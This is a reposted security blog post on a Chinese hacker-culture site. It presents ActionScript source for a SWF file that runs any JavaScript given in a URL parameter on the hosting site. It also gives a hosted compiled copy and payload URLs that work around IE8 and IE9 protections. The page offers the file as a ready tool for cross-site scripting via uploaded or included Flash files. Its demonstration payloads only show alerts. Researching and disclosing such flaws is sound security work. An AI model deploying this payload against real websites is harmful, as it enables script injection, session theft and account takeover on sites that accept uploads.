记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

XSS by uploading/including a SWF file

2013-08-29 14:25
On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
 
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
 
Note: IE has a protection to make the “document” object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Javascript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).
 
Here is the actionscript code:
 


package
{
import flash.display.Sprite;
import flash.external.*;
import flash.system.System;
public class XSSProject extends Sprite
{
public function XSSProject()
{
flash.system.Security.allowDomain("*");
ExternalInterface.marshallExceptions = true;
try {
ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
} catch(e:Error) {
trace(e);
}
}
}
}

 
Compiled file is accessbile via: http://0me.me/demo/xss/xssproject.swf
 
Examples:
 
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
 
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
 
References:
 
[1] The other reason to beware ExternalInterface.call() (URL: http://lcamtuf.blogspot.co.uk/2011/03/other-reason-to-beware-of.html)
 
[2] Flash ExternalInterface.call() JavaScript Injection – can make the websites vulnerable to XSS (URL:http://soroush.secproject.com/blog/2011/03/flash-externalinterface-call-javascript-injection-%E2%80%93-can-make-the-websites-vulnerable-to-xss/)
 
from:http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/
知识来源: www.2cto.com/Article/201308/239737.html

阅读:62453 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“XSS by uploading/including a SWF file”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云